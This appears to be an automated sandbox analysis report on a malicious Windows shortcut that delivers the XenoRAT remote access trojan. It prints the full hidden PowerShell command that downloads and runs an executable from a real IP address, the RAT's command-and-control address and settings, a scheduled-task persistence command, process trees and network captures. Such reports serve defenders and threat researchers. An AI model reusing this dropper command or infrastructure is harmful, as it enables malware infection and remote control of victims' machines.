Analysis

  • max time kernel
    150s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-07-2024 09:38

General

  • Target

    1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk

  • Size

    2KB

  • MD5

    4db66f511c6604f1be1ae032b84f8358

  • SHA1

    8ab73293cf42ead05326874845622cea78822c8f

  • SHA256

    1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7

  • SHA512

    2cf294db093bbe00ce504d2817dced1d62d7eb8af4a7183836fb4af0288f7e5018cd2226bea522ad5464b911317bd184bb36303e766fa4a59239f87878510c67

Malware Config

Extracted

Language
ps1
Source
1
-hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';
URLs
exe.dropper

http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe

Extracted

Family

xenorat

C2

45.66.231.63

Mutex

Holid_rat_nd8859g

Attributes
  • delay

    60400

  • install_path

    appdata

  • port

    1243

  • startup_name

    HDdisplay

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4856
    • C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1816
      • C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
        "C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:60
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\eystsdf.cmd" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2536
          • C:\Users\Admin\AppData\Roaming\efthfxj.sfx.exe
            efthfxj.sfx.exe -pgtrfdewscbsdyethnymkdesppodtyuhngfszafugyRhvqxsdfHbgnmeG -dC:\Users\Admin\AppData\Roaming
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2800
            • C:\Users\Admin\AppData\Roaming\efthfxj.exe
              "C:\Users\Admin\AppData\Roaming\efthfxj.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5116
              • C:\Users\Admin\AppData\Roaming\efthfxj.exe
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4852
                • C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                  "C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3196
                  • C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    9⤵
                    • Executes dropped EXE
                    PID:4876
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 84
                      10⤵
                      • Program crash
                      PID:3892
                  • C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    9⤵
                    • Executes dropped EXE
                    PID:4788
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 80
                      10⤵
                      • Program crash
                      PID:3968
                  • C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    9⤵
                    • Executes dropped EXE
                    PID:1236
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 80
                      10⤵
                      • Program crash
                      PID:2156
                  • C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    9⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2164
                    • C:\Windows\SysWOW64\schtasks.exe
                      "schtasks.exe" /Create /TN "HDdisplay" /XML "C:\Users\Admin\AppData\Local\Temp\tmp35BC.tmp" /F
                      10⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:5104
              • C:\Users\Admin\AppData\Roaming\efthfxj.exe
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                7⤵
                • Executes dropped EXE
                PID:1428
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 80
                  8⤵
                  • Program crash
                  PID:4548
              • C:\Users\Admin\AppData\Roaming\efthfxj.exe
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                7⤵
                • Executes dropped EXE
                • Suspicious use of UnmapMainImage
                PID:776
              • C:\Users\Admin\AppData\Roaming\efthfxj.exe
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                7⤵
                • Executes dropped EXE
                PID:4820
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1428 -ip 1428
    1⤵
      PID:1960
    • C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 776 -ip 776
      1⤵
        PID:4128
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4820 -ip 4820
        1⤵
          PID:2488
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4876 -ip 4876
          1⤵
            PID:3528
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4788 -ip 4788
            1⤵
              PID:2816
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1236 -ip 1236
              1⤵
                PID:4780

              Network

              • flag-us
                DNS
                217.106.137.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                217.106.137.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                172.214.232.199.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                172.214.232.199.in-addr.arpa
                IN PTR
                Response
              • flag-nl
                GET
                http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
                PoWersheLl.exe
                Remote address:
                94.156.67.244:5679
                Request
                GET /abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe HTTP/1.1
                Host: 94.156.67.244:5679
                Connection: Keep-Alive
                Response
                HTTP/1.1 200 OK
                Server: nginx/1.10.3
                Date: Sat, 27 Jul 2024 09:40:18 GMT
                Content-Type: application/octet-stream
                Content-Length: 629724
                Last-Modified: Sat, 27 Jul 2024 06:37:56 GMT
                Connection: keep-alive
                ETag: "66a495c4-99bdc"
                Accept-Ranges: bytes
              • flag-us
                DNS
                g.bing.com
                Remote address:
                8.8.8.8:53
                Request
                g.bing.com
                IN A
                Response
                g.bing.com
                IN CNAME
                g-bing-com.dual-a-0034.a-msedge.net
                g-bing-com.dual-a-0034.a-msedge.net
                IN CNAME
                dual-a-0034.a-msedge.net
                dual-a-0034.a-msedge.net
                IN A
                204.79.197.237
                dual-a-0034.a-msedge.net
                IN A
                13.107.21.237
              • flag-us
                DNS
                244.67.156.94.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                244.67.156.94.in-addr.arpa
                IN PTR
                Response
              • flag-us
                GET
                https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                Remote address:
                204.79.197.237:443
                Request
                GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                set-cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8; domain=.bing.com; expires=Thu, 21-Aug-2025 09:40:23 GMT; path=/; SameSite=None; Secure; Priority=High;
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 1EA0C797C2394F21ABCB740B17F38FC4 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
                date: Sat, 27 Jul 2024 09:40:22 GMT
              • flag-us
                GET
                https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                Remote address:
                204.79.197.237:443
                Request
                GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                set-cookie: MSPTC=lUR2t-R3pzz_JvIerSdSItBBMBWqRBqXLOZ--K7TqLM; domain=.bing.com; expires=Thu, 21-Aug-2025 09:40:23 GMT; path=/; Partitioned; secure; SameSite=None
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: C9C77E08551E4C50802603FF473BD1C3 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
                date: Sat, 27 Jul 2024 09:40:22 GMT
              • flag-us
                GET
                https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                Remote address:
                204.79.197.237:443
                Request
                GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8; MSPTC=lUR2t-R3pzz_JvIerSdSItBBMBWqRBqXLOZ--K7TqLM
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: EC06ACEB9EBB42CABFBC613FF00ADF67 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
                date: Sat, 27 Jul 2024 09:40:22 GMT
              • flag-us
                DNS
                237.197.79.204.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                237.197.79.204.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                17.160.190.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                17.160.190.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                55.36.223.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                55.36.223.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                228.249.119.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                228.249.119.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                183.142.211.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                183.142.211.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                26.165.165.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                26.165.165.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                56.126.166.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                56.126.166.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                217.135.221.88.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                217.135.221.88.in-addr.arpa
                IN PTR
                Response
                217.135.221.88.in-addr.arpa
                IN PTR
                a88-221-135-217deploystaticakamaitechnologiescom
              • flag-us
                DNS
                tse1.mm.bing.net
                Remote address:
                8.8.8.8:53
                Request
                tse1.mm.bing.net
                IN A
                Response
                tse1.mm.bing.net
                IN CNAME
                mm-mm.bing.net.trafficmanager.net
                mm-mm.bing.net.trafficmanager.net
                IN CNAME
                ax-0001.ax-msedge.net
                ax-0001.ax-msedge.net
                IN A
                150.171.28.10
                ax-0001.ax-msedge.net
                IN A
                150.171.27.10
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                Remote address:
                150.171.28.10:443
                Request
                GET /th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 525311
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: D322E6E5001B4C96AD331F29DFBBF045 Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
                date: Sat, 27 Jul 2024 09:42:06 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                Remote address:
                150.171.28.10:443
                Request
                GET /th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 589683
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 2FDB249C2C7A47CA908B83FB37FF85DB Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
                date: Sat, 27 Jul 2024 09:42:06 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                Remote address:
                150.171.28.10:443
                Request
                GET /th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 592830
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: B34D85E3DFFA43C5AAFE69D8AD8FB4AC Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
                date: Sat, 27 Jul 2024 09:42:06 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                Remote address:
                150.171.28.10:443
                Request
                GET /th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 575578
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: F5BCBD33E8C04898B812E1FADA2EEAF5 Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
                date: Sat, 27 Jul 2024 09:42:06 GMT
              • flag-us
                DNS
                66.112.168.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                66.112.168.52.in-addr.arpa
                IN PTR
                Response
              • 94.156.67.244:5679
                http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
                http
                PoWersheLl.exe
                12.7kB
                648.7kB
                257
                467

                HTTP Request

                GET http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe

                HTTP Response

                200
              • 204.79.197.237:443
                https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                tls, http2
                2.0kB
                9.4kB
                22
                20

                HTTP Request

                GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=

                HTTP Response

                204

                HTTP Request

                GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=

                HTTP Response

                204

                HTTP Request

                GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=

                HTTP Response

                204
              • 45.66.231.63:1243
                efthfxj.exe
                260 B
                5
              • 150.171.28.10:443
                tse1.mm.bing.net
                tls, http2
                1.2kB
                6.9kB
                15
                13
              • 150.171.28.10:443
                tse1.mm.bing.net
                tls, http2
                1.2kB
                6.9kB
                15
                13
              • 150.171.28.10:443
                https://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                tls, http2
                80.1kB
                2.4MB
                1716
                1712

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                HTTP Request

                GET https://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200

                HTTP Response

                200
              • 150.171.28.10:443
                tse1.mm.bing.net
                tls, http2
                1.2kB
                6.9kB
                15
                13
              • 45.66.231.63:1243
                efthfxj.exe
                260 B
                5
              • 8.8.8.8:53
                217.106.137.52.in-addr.arpa
                dns
                73 B
                147 B
                1
                1

                DNS Request

                217.106.137.52.in-addr.arpa

              • 8.8.8.8:53
                172.214.232.199.in-addr.arpa
                dns
                74 B
                128 B
                1
                1

                DNS Request

                172.214.232.199.in-addr.arpa

              • 8.8.8.8:53
                g.bing.com
                dns
                128 B
                283 B
                2
                2

                DNS Request

                g.bing.com

                DNS Response

                204.79.197.237
                13.107.21.237

                DNS Request

                244.67.156.94.in-addr.arpa

              • 8.8.8.8:53
                237.197.79.204.in-addr.arpa
                dns
                73 B
                143 B
                1
                1

                DNS Request

                237.197.79.204.in-addr.arpa

              • 8.8.8.8:53
                17.160.190.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                17.160.190.20.in-addr.arpa

              • 8.8.8.8:53
                55.36.223.20.in-addr.arpa
                dns
                71 B
                157 B
                1
                1

                DNS Request

                55.36.223.20.in-addr.arpa

              • 8.8.8.8:53
                228.249.119.40.in-addr.arpa
                dns
                73 B
                159 B
                1
                1

                DNS Request

                228.249.119.40.in-addr.arpa

              • 8.8.8.8:53
                183.142.211.20.in-addr.arpa
                dns
                73 B
                159 B
                1
                1

                DNS Request

                183.142.211.20.in-addr.arpa

              • 8.8.8.8:53
                26.165.165.52.in-addr.arpa
                dns
                72 B
                146 B
                1
                1

                DNS Request

                26.165.165.52.in-addr.arpa

              • 8.8.8.8:53
                56.126.166.20.in-addr.arpa
                dns
                72 B
                158 B
                1
                1

                DNS Request

                56.126.166.20.in-addr.arpa

              • 8.8.8.8:53
                217.135.221.88.in-addr.arpa
                dns
                73 B
                139 B
                1
                1

                DNS Request

                217.135.221.88.in-addr.arpa

              • 8.8.8.8:53
                tse1.mm.bing.net
                dns
                62 B
                170 B
                1
                1

                DNS Request

                tse1.mm.bing.net

                DNS Response

                150.171.28.10
                150.171.27.10

              • 8.8.8.8:53
                66.112.168.52.in-addr.arpa
                dns
                72 B
                146 B
                1
                1

                DNS Request

                66.112.168.52.in-addr.arpa

              MITRE ATT&CK Enterprise v15

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\efthfxj.exe.log

                Filesize

                522B

                MD5

                8334a471a4b492ece225b471b8ad2fc8

                SHA1

                1cb24640f32d23e8f7800bd0511b7b9c3011d992

                SHA256

                5612afe347d8549cc95a0c710602bcc7d7b224361b613c0a6ba362092300c169

                SHA512

